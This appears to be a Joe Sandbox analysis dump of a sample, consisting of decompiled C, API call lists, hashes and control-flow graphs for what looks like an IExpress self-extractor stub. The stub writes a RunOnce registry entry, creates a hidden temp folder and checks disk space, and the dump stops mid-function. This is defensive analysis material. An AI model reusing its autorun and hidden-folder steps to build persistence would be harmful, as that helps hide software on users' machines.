                                                0x00ac2204
                                                0x00ac2213
                                                0x00ac2218
                                                0x00ac221d
                                                0x00ac221d
                                                0x00ac2220
                                                0x00ac2220
                                                0x00ac2222
                                                0x00ac2223
                                                0x00ac2229
                                                0x00ac223d
                                                0x00ac2249
                                                0x00ac2250
                                                0x00000000
                                                0x00ac2250
                                                0x00ac21d2
                                                0x00ac21d9
                                                0x00000000
                                                0x00ac21d9
                                                0x00ac213a
                                                0x00ac2141
                                                0x00ac2144
                                                0x00ac214c
                                                0x00000000
                                                0x00000000
                                                0x00ac2163
                                                0x00ac2172
                                                0x00ac2172
                                                0x00000000
                                                0x00ac2163
                                                0x00ac20ea
                                                0x00ac20f0
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 00AC2050
                                                • memset.MSVCRT ref: 00AC205F
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00AC208C
                                                  • Part of subcall function 00AC171E: _vsnprintf.MSVCRT ref: 00AC1750
                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC20C9
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC20EA
                                                • GetSystemDirectoryA.KERNEL32 ref: 00AC2103
                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2122
                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00AC2134
                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2144
                                                • GetSystemDirectoryA.KERNEL32 ref: 00AC215B
                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC218C
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC21C1
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC21E4
                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00AC223D
                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2249
                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2250
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                • API String ID: 178549006-455997452
                                                • Opcode ID: a813d7beb76a2a81680281a30fa5c07db1af308b5abfbe22ecaa650c5caf8eb7
                                                • Instruction ID: 406928a2f792a6d4ee97adfa3c9dc9e87fc9d0a44e6de8a12830b6bed3b51d07
                                                • Opcode Fuzzy Hash: a813d7beb76a2a81680281a30fa5c07db1af308b5abfbe22ecaa650c5caf8eb7
                                                • Instruction Fuzzy Hash: 34510571A40218ABDB20DBA4DC4DFFB777CFB54740F0602ACFA49E6151EA749E468B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 ac55a0-ac55d9 call ac468f LocalAlloc 235 ac55fd-ac560c call ac468f 232->235 236 ac55db-ac55f1 call ac44b9 call ac6285 232->236 242 ac560e-ac5630 call ac44b9 LocalFree 235->242 243 ac5632-ac5643 lstrcmpA 235->243 250 ac55f6-ac55f8 236->250 242->250 246 ac564b-ac5659 LocalFree 243->246 247 ac5645 243->247 248 ac565b-ac565d 246->248 249 ac5696-ac569c 246->249 247->246 252 ac565f-ac5667 248->252 253 ac5669 248->253 255 ac589f-ac58b5 call ac6517 249->255 256 ac56a2-ac56a8 249->256 254 ac58b7-ac58c7 call ac6ce0 250->254 252->253 257 ac566b-ac567a call ac5467 252->257 253->257 255->254 256->255 260 ac56ae-ac56c1 GetTempPathA 256->260 269 ac589b-ac589d 257->269 270 ac5680-ac5691 call ac44b9 257->270 264 ac56f3-ac5711 call ac1781 260->264 265 ac56c3-ac56c9 call ac5467 260->265 275 ac586c-ac5890 GetWindowsDirectoryA call ac597d 264->275 276 ac5717-ac5729 GetDriveTypeA 264->276 272 ac56ce-ac56d0 265->272 269->254 270->250 272->269 273 ac56d6-ac56df call ac2630 272->273 273->264 286 ac56e1-ac56ed call ac5467 273->286 275->264 287 ac5896 275->287 280 ac572b-ac572e 276->280 281 ac5730-ac5740 GetFileAttributesA 276->281 280->281 284 ac5742-ac5745 280->284 281->284 285 ac577e-ac578f call ac597d 281->285 289 ac576b 284->289 290 ac5747-ac574f 284->290 297 ac5791-ac579e call ac2630 285->297 298 ac57b2-ac57bf call ac2630 285->298 286->264 286->269 287->269 292 ac5771-ac5779 289->292 290->292 294 ac5751-ac5753 290->294 296 ac5864-ac5866 292->296 294->292 299 ac5755-ac5762 call ac6952 294->299 296->275 296->276 297->289 309 ac57a0-ac57b0 call ac597d 297->309 306 ac57c1-ac57cd GetWindowsDirectoryA 298->306 307 ac57d3-ac57f8 call ac658a GetFileAttributesA 298->307 299->289 308 ac5764-ac5769 299->308 306->307 314 ac580a 307->314 315 ac57fa-ac5808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->298 316 ac580d-ac580f 314->316 315->316 317 ac5827-ac585c SetFileAttributesA call ac1781 call ac5467 316->317 318 ac5811-ac5825 316->318 317->269 323 ac585e 317->323 318->296 323->296
                                                C-Code - Quality: 92%
                                                			E00AC55A0(void* __eflags) {
                                                				signed int _v8;
                                                				char _v265;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				int _t32;
                                                				int _t33;
                                                				int _t35;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				int _t40;
                                                				int _t44;
                                                				long _t48;
                                                				int _t49;
                                                				int _t50;
                                                				signed int _t53;
                                                				int _t54;
                                                				int _t59;
                                                				char _t60;
                                                				int _t65;
                                                				char _t66;
                                                				int _t67;
                                                				int _t68;
                                                				int _t69;
                                                				int _t70;
                                                				int _t71;
                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                				int _t73;
                                                				CHAR* _t82;
                                                				CHAR* _t88;
                                                				void* _t103;
                                                				signed int _t110;
                                                
                                                				_t28 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t28 ^ _t110;
                                                				_t2 = E00AC468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                				_t109 = LocalAlloc(0x40, _t2);
                                                				if(_t109 != 0) {
                                                					_t82 = "RUNPROGRAM";
                                                					_t32 = E00AC468F(_t82, _t109, 1);
                                                					__eflags = _t32;
                                                					if(_t32 != 0) {
                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                						__eflags = _t33;
                                                						if(_t33 == 0) {
                                                							 *0xac9a30 = 1;
                                                						}
                                                						LocalFree(_t109);
                                                						_t35 =  *0xac8b3e; // 0x0
                                                						__eflags = _t35;
                                                						if(_t35 == 0) {
                                                							__eflags =  *0xac8a24; // 0x0
                                                							if(__eflags != 0) {
                                                								L46:
                                                								_t101 = 0x7d2;
                                                								_t36 = E00AC6517(_t82, 0x7d2, 0, E00AC3210, 0, 0);
                                                								asm("sbb eax, eax");
                                                								_t38 =  ~( ~_t36);
                                                							} else {
                                                								__eflags =  *0xac9a30; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L46;
                                                								} else {
                                                									_t109 = 0xac91e4;
                                                									_t40 = GetTempPathA(0x104, 0xac91e4);
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L19:
                                                										_push(_t82);
                                                										E00AC1781( &_v268, 0x104, _t82, "A:\\");
                                                										__eflags = _v268 - 0x5a;
                                                										if(_v268 <= 0x5a) {
                                                											do {
                                                												_t109 = GetDriveTypeA( &_v268);
                                                												__eflags = _t109 - 6;
                                                												if(_t109 == 6) {
                                                													L22:
                                                													_t48 = GetFileAttributesA( &_v268);
                                                													__eflags = _t48 - 0xffffffff;
                                                													if(_t48 != 0xffffffff) {
                                                														goto L30;
                                                													} else {
                                                														goto L23;
                                                													}
                                                												} else {
                                                													__eflags = _t109 - 3;
                                                													if(_t109 != 3) {
                                                														L23:
                                                														__eflags = _t109 - 2;
                                                														if(_t109 != 2) {
                                                															L28:
                                                															_t66 = _v268;
                                                															goto L29;
                                                														} else {
                                                															_t66 = _v268;
                                                															__eflags = _t66 - 0x41;
                                                															if(_t66 == 0x41) {
                                                																L29:
                                                																_t60 = _t66 + 1;
                                                																_v268 = _t60;
                                                																goto L42;
                                                															} else {
                                                																__eflags = _t66 - 0x42;
                                                																if(_t66 == 0x42) {
                                                																	goto L29;
                                                																} else {
                                                																	_t68 = E00AC6952( &_v268);
                                                																	__eflags = _t68;
                                                																	if(_t68 == 0) {
                                                																		goto L28;
                                                																	} else {
                                                																		__eflags = _t68 - 0x19000;
                                                																		if(_t68 >= 0x19000) {
                                                																			L30:
                                                																			_push(0);
                                                																			_t103 = 3;
                                                																			_t49 = E00AC597D( &_v268, _t103, 1);
                                                																			__eflags = _t49;
                                                																			if(_t49 != 0) {
                                                																				L33:
                                                																				_t50 = E00AC2630(0,  &_v268, 1);
                                                																				__eflags = _t50;
                                                																				if(_t50 != 0) {
                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                																				}
                                                																				_t88 =  &_v268;
                                                																				E00AC658A(_t88, 0x104, "msdownld.tmp");
                                                																				_t53 = GetFileAttributesA( &_v268);
                                                																				__eflags = _t53 - 0xffffffff;
                                                																				if(_t53 != 0xffffffff) {
                                                																					_t54 = _t53 & 0x00000010;
                                                																					__eflags = _t54;
                                                																				} else {
                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                																				}
                                                																				__eflags = _t54;
                                                																				if(_t54 != 0) {
                                                																					SetFileAttributesA( &_v268, 2);
                                                																					_push(_t88);
                                                																					_t109 = 0xac91e4;
                                                																					E00AC1781(0xac91e4, 0x104, _t88,  &_v268);
                                                																					_t101 = 1;
                                                																					_t59 = E00AC5467(0xac91e4, 1, 0);
                                                																					__eflags = _t59;
                                                																					if(_t59 != 0) {
                                                																						goto L45;
                                                																					} else {
                                                																						_t60 = _v268;
                                                																						goto L42;
                                                																					}
                                                																				} else {
                                                																					_t60 = _v268 + 1;
                                                																					_v265 = 0;
                                                																					_v268 = _t60;
                                                																					goto L42;
                                                																				}
                                                																			} else {
                                                																				_t65 = E00AC2630(0,  &_v268, 1);
                                                																				__eflags = _t65;
                                                																				if(_t65 != 0) {
                                                																					goto L28;
                                                																				} else {
                                                																					_t67 = E00AC597D( &_v268, 1, 1, 0);
                                                																					__eflags = _t67;
                                                																					if(_t67 == 0) {
                                                																						goto L28;
                                                																					} else {
                                                																						goto L33;
                                                																					}
                                                																				}
                                                																			}
                                                																		} else {
                                                																			goto L28;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														goto L22;
                                                													}
                                                												}
                                                												goto L47;
                                                												L42:
                                                												__eflags = _t60 - 0x5a;
                                                											} while (_t60 <= 0x5a);
                                                										}
                                                										goto L43;
                                                									} else {
                                                										_t101 = 1;
                                                										_t69 = E00AC5467(0xac91e4, 1, 3); // executed
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											goto L45;
                                                										} else {
                                                											_t82 = 0xac91e4;
                                                											_t70 = E00AC2630(0, 0xac91e4, 1);
                                                											__eflags = _t70;
                                                											if(_t70 != 0) {
                                                												goto L19;
                                                											} else {
                                                												_t101 = 1;
                                                												_t82 = 0xac91e4;
                                                												_t71 = E00AC5467(0xac91e4, 1, 1);
                                                												__eflags = _t71;
                                                												if(_t71 != 0) {
                                                													goto L45;
                                                												} else {
                                                													do {
                                                														goto L19;
                                                														L43:
                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                														_push(4);
                                                														_t101 = 3;
                                                														_t82 =  &_v268;
                                                														_t44 = E00AC597D(_t82, _t101, 1);
                                                														__eflags = _t44;
                                                													} while (_t44 != 0);
                                                													goto L2;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							__eflags = _t35 - 0x5c;
                                                							if(_t35 != 0x5c) {
                                                								L10:
                                                								_t72 = 1;
                                                							} else {
                                                								__eflags =  *0xac8b3f - _t35; // 0x0
                                                								_t72 = 0;
                                                								if(__eflags != 0) {
                                                									goto L10;
                                                								}
                                                							}
                                                							_t101 = 0;
                                                							_t73 = E00AC5467(0xac8b3e, 0, _t72);
                                                							__eflags = _t73;
                                                							if(_t73 != 0) {
                                                								L45:
                                                								_t38 = 1;
                                                							} else {
                                                								_t101 = 0x4be;
                                                								E00AC44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                								goto L2;
                                                							}
                                                						}
                                                					} else {
                                                						_t101 = 0x4b1;
                                                						E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						LocalFree(_t109);
                                                						 *0xac9124 = 0x80070714;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					_t101 = 0x4b5;
                                                					E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					 *0xac9124 = E00AC6285();
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				L47:
                                                				return E00AC6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                			}





































                                                0x00ac55ab
                                                0x00ac55b2
                                                0x00ac55c9
                                                0x00ac55d5
                                                0x00ac55d9
                                                0x00ac5600
                                                0x00ac5605
                                                0x00ac560a
                                                0x00ac560c
                                                0x00ac5638
                                                0x00ac5641
                                                0x00ac5643
                                                0x00ac5645
                                                0x00ac5645
                                                0x00ac564c
                                                0x00ac5652
                                                0x00ac5657
                                                0x00ac5659
                                                0x00ac5696
                                                0x00ac569c
                                                0x00ac589f
                                                0x00ac58a7
                                                0x00ac58ac
                                                0x00ac58b3
                                                0x00ac58b5
                                                0x00ac56a2
                                                0x00ac56a2
                                                0x00ac56a8
                                                0x00000000
                                                0x00ac56ae
                                                0x00ac56ae
                                                0x00ac56b9
                                                0x00ac56bf
                                                0x00ac56c1
                                                0x00ac56f3
                                                0x00ac56f3
                                                0x00ac5705
                                                0x00ac570a
                                                0x00ac5711
                                                0x00ac5717
                                                0x00ac5724
                                                0x00ac5726
                                                0x00ac5729
                                                0x00ac5730
                                                0x00ac5737
                                                0x00ac573d
                                                0x00ac5740
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac572b
                                                0x00ac572b
                                                0x00ac572e
                                                0x00ac5742
                                                0x00ac5742
                                                0x00ac5745
                                                0x00ac576b
                                                0x00ac576b
                                                0x00000000
                                                0x00ac5747
                                                0x00ac5747
                                                0x00ac574d
                                                0x00ac574f
                                                0x00ac5771
                                                0x00ac5771
                                                0x00ac5773
                                                0x00000000
                                                0x00ac5751
                                                0x00ac5751
                                                0x00ac5753
                                                0x00000000
                                                0x00ac5755
                                                0x00ac575b
                                                0x00ac5760
                                                0x00ac5762
                                                0x00000000
                                                0x00ac5764
                                                0x00ac5764
                                                0x00ac5769
                                                0x00ac577e
                                                0x00ac577e
                                                0x00ac5781
                                                0x00ac5788
                                                0x00ac578d
                                                0x00ac578f
                                                0x00ac57b2
                                                0x00ac57b8
                                                0x00ac57bd
                                                0x00ac57bf
                                                0x00ac57cd
                                                0x00ac57cd
                                                0x00ac57dd
                                                0x00ac57e3
                                                0x00ac57ef
                                                0x00ac57f5
                                                0x00ac57f8
                                                0x00ac580a
                                                0x00ac580a
                                                0x00ac57fa
                                                0x00ac5802
                                                0x00ac5802
                                                0x00ac580d
                                                0x00ac580f
                                                0x00ac5830
                                                0x00ac5836
                                                0x00ac583d
                                                0x00ac584b
                                                0x00ac5851
                                                0x00ac5855
                                                0x00ac585a
                                                0x00ac585c
                                                0x00000000
                                                0x00ac585e
                                                0x00ac585e
                                                0x00000000
                                                0x00ac585e
                                                0x00ac5811
                                                0x00ac5817
                                                0x00ac5819
                                                0x00ac581f
                                                0x00000000
                                                0x00ac581f
                                                0x00ac5791
                                                0x00ac5797
                                                0x00ac579c
                                                0x00ac579e
                                                0x00000000
                                                0x00ac57a0
                                                0x00ac57a9
                                                0x00ac57ae
                                                0x00ac57b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac57b0
                                                0x00ac579e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5769
                                                0x00ac5762
                                                0x00ac5753
                                                0x00ac574f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac572e
                                                0x00000000
                                                0x00ac5864
                                                0x00ac5864
                                                0x00ac5864
                                                0x00ac5717
                                                0x00000000
                                                0x00ac56c3
                                                0x00ac56c5
                                                0x00ac56c9
                                                0x00ac56ce
                                                0x00ac56d0
                                                0x00000000
                                                0x00ac56d6
                                                0x00ac56d6
                                                0x00ac56d8
                                                0x00ac56dd
                                                0x00ac56df
                                                0x00000000
                                                0x00ac56e1
                                                0x00ac56e2
                                                0x00ac56e4
                                                0x00ac56e6
                                                0x00ac56eb
                                                0x00ac56ed
                                                0x00000000
                                                0x00ac56f3
                                                0x00ac56f3
                                                0x00000000
                                                0x00ac586c
                                                0x00ac5878
                                                0x00ac587e
                                                0x00ac5882
                                                0x00ac5883
                                                0x00ac5889
                                                0x00ac588e
                                                0x00ac588e
                                                0x00000000
                                                0x00ac5896
                                                0x00ac56ed
                                                0x00ac56df
                                                0x00ac56d0
                                                0x00ac56c1
                                                0x00ac56a8
                                                0x00ac565b
                                                0x00ac565b
                                                0x00ac565d
                                                0x00ac5669
                                                0x00ac5669
                                                0x00ac565f
                                                0x00ac565f
                                                0x00ac5665
                                                0x00ac5667
                                                0x00000000
                                                0x00000000
                                                0x00ac5667
                                                0x00ac566c
                                                0x00ac5673
                                                0x00ac5678
                                                0x00ac567a
                                                0x00ac589b
                                                0x00ac589b
                                                0x00ac5680
                                                0x00ac5685
                                                0x00ac568c
                                                0x00000000
                                                0x00ac568c
                                                0x00ac567a
                                                0x00ac560e
                                                0x00ac5613
                                                0x00ac561a
                                                0x00ac5620
                                                0x00ac5626
                                                0x00000000
                                                0x00ac5626
                                                0x00ac55db
                                                0x00ac55e0
                                                0x00ac55e7
                                                0x00ac55f1
                                                0x00ac55f6
                                                0x00ac55f6
                                                0x00ac55f6
                                                0x00ac58b7
                                                0x00ac58c7

                                                APIs
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00AC55CF
                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00AC5638
                                                • LocalFree.KERNEL32(00000000), ref: 00AC564C
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00AC5620
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                  • Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285
                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC56B9
                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00AC571E
                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00AC5737
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00AC57CD
                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00AC57EF
                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00AC5802
                                                  • Part of subcall function 00AC2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00AC2654
                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00AC5830
                                                  • Part of subcall function 00AC6517: FindResourceA.KERNEL32(00AC0000,000007D6,00000005), ref: 00AC652A
                                                  • Part of subcall function 00AC6517: LoadResource.KERNEL32(00AC0000,00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00AC6538
                                                  • Part of subcall function 00AC6517: DialogBoxIndirectParamA.USER32(00AC0000,00000000,00000547,00AC19E0,00000000), ref: 00AC6557
                                                  • Part of subcall function 00AC6517: FreeResource.KERNEL32(00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00AC6560
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00AC5878
                                                  • Part of subcall function 00AC597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00AC59A8
                                                  • Part of subcall function 00AC597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00AC59AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                • API String ID: 2436801531-429805196
                                                • Opcode ID: 8a5682e1224989b99bf33ad9f75c833300a4549844fb89488b4ab98f460d2312
                                                • Instruction ID: c87f6e5e8204de8e06eb1b06ffdfae67e881a89d215bad227ace3a521b2289aa
                                                • Opcode Fuzzy Hash: 8a5682e1224989b99bf33ad9f75c833300a4549844fb89488b4ab98f460d2312
                                                • Instruction Fuzzy Hash: D6811670E04A089ADB249BB48D45FFE72ADAF61344F07056DF586D2191DF74ADC28B10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 ac597d-ac59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 ac59dd-ac5a1b GetDiskFreeSpaceA 324->325 326 ac59bb-ac59d8 call ac44b9 call ac6285 324->326 327 ac5ba1-ac5bde memset call ac6285 GetLastError FormatMessageA 325->327 328 ac5a21-ac5a4a MulDiv 325->328 345 ac5c05-ac5c14 call ac6ce0 326->345 337 ac5be3-ac5bfc call ac44b9 SetCurrentDirectoryA 327->337 328->327 331 ac5a50-ac5a6c GetVolumeInformationA 328->331 334 ac5a6e-ac5ab0 memset call ac6285 GetLastError FormatMessageA 331->334 335 ac5ab5-ac5aca SetCurrentDirectoryA 331->335 334->337 339 ac5acc-ac5ad1 335->339 351 ac5c02 337->351 343 ac5ae2-ac5ae4 339->343 344 ac5ad3-ac5ad8 339->344 349 ac5ae6 343->349 350 ac5ae7-ac5af8 343->350 344->343 347 ac5ada-ac5ae0 344->347 347->339 347->343 349->350 353 ac5af9-ac5afb 350->353 354 ac5c04 351->354 355 ac5afd-ac5b03 353->355 356 ac5b05-ac5b08 353->356 354->345 355->353 355->356 357 ac5b0a-ac5b1b call ac44b9 356->357 358 ac5b20-ac5b27 356->358 357->351 360 ac5b29-ac5b33 358->360 361 ac5b52-ac5b5b 358->361 360->361 363 ac5b35-ac5b50 360->363 364 ac5b62-ac5b6d 361->364 363->364 365 ac5b6f-ac5b74 364->365 366 ac5b76-ac5b7d 364->366 367 ac5b85 365->367 368 ac5b7f-ac5b81 366->368 369 ac5b83 366->369 370 ac5b96-ac5b9f 367->370 371 ac5b87-ac5b94 call ac268b 367->371 368->367 369->367 370->354 371->354
                                                C-Code - Quality: 96%
                                                			E00AC597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v16;
                                                				char _v276;
                                                				char _v788;
                                                				long _v792;
                                                				long _v796;
                                                				long _v800;
                                                				signed int _v804;
                                                				long _v808;
                                                				int _v812;
                                                				long _v816;
                                                				long _v820;
                                                				void* __ebx;
                                                				void* __esi;
                                                				signed int _t46;
                                                				int _t50;
                                                				signed int _t55;
                                                				void* _t66;
                                                				int _t69;
                                                				signed int _t73;
                                                				signed short _t78;
                                                				signed int _t87;
                                                				signed int _t101;
                                                				int _t102;
                                                				unsigned int _t103;
                                                				unsigned int _t105;
                                                				signed int _t111;
                                                				long _t112;
                                                				signed int _t116;
                                                				CHAR* _t118;
                                                				signed int _t119;
                                                				signed int _t120;
                                                
                                                				_t114 = __edi;
                                                				_t46 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t46 ^ _t120;
                                                				_v804 = __edx;
                                                				_t118 = __ecx;
                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                				if(_t50 != 0) {
                                                					_push(__edi);
                                                					_v796 = 0;
                                                					_v792 = 0;
                                                					_v800 = 0;
                                                					_v808 = 0;
                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                					__eflags = _t55;
                                                					if(_t55 == 0) {
                                                						L29:
                                                						memset( &_v788, 0, 0x200);
                                                						 *0xac9124 = E00AC6285();
                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                						_t110 = 0x4b0;
                                                						L30:
                                                						__eflags = 0;
                                                						E00AC44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                						SetCurrentDirectoryA( &_v276);
                                                						L31:
                                                						_t66 = 0;
                                                						__eflags = 0;
                                                						L32:
                                                						_pop(_t114);
                                                						goto L33;
                                                					}
                                                					_t69 = _v792 * _v796;
                                                					_v812 = _t69;
                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                					__eflags = _t116;
                                                					if(_t116 == 0) {
                                                						goto L29;
                                                					}
                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                					__eflags = _t73;
                                                					if(_t73 != 0) {
                                                						SetCurrentDirectoryA( &_v276); // executed
                                                						_t101 =  &_v16;
                                                						_t111 = 6;
                                                						_t119 = _t118 - _t101;
                                                						__eflags = _t119;
                                                						while(1) {
                                                							_t22 = _t111 - 4; // 0x2
                                                							__eflags = _t22;
                                                							if(_t22 == 0) {
                                                								break;
                                                							}
                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                							__eflags = _t87;
                                                							if(_t87 == 0) {
                                                								break;
                                                							}
                                                							 *_t101 = _t87;
                                                							_t101 = _t101 + 1;
                                                							_t111 = _t111 - 1;
                                                							__eflags = _t111;
                                                							if(_t111 != 0) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t111;
                                                						if(_t111 == 0) {
                                                							_t101 = _t101 - 1;
                                                							__eflags = _t101;
                                                						}
                                                						 *_t101 = 0;
                                                						_t112 = 0x200;
                                                						_t102 = _v812;
                                                						_t78 = 0;
                                                						_t118 = 8;
                                                						while(1) {
